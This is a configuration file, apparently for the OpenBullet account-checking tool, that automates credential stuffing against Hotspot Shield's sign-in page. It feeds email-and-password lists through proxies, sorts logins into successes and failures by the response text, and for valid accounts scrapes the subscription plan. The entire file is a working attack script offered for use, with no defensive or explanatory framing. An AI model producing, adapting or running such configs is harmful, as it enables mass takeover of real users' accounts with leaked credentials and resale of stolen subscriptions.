[SETTINGS]
{
  "Name": "HHS",
  "SuggestedBots": 100,
  "LastModified": "2018-06-03T03:34:45.9365524+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://account.hotspotshield.com/sign-in" AutoRedirect=TRUE 
  CONTENT "login=<USER>&pwd=<PASS>&remember=0&ajax=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "referer: https://account.hotspotshield.com/sign-in/?af_source=vpnofferlp&af_content=no_action" 
  HEADER "origin: https://account.hotspotshield.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "The username and\/or password is incorrect" 
  KEYCHAIN Success OR 
    KEY "{\"result\":1,\"error\":null,\"debug\":null}" 
#REQUEST_ACC_INFO REQUEST GET "https://account.hotspotshield.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "'gaDimensionUserStatus': '" "'," Recursive=FALSE -> CAP "PLAN" "" "" 
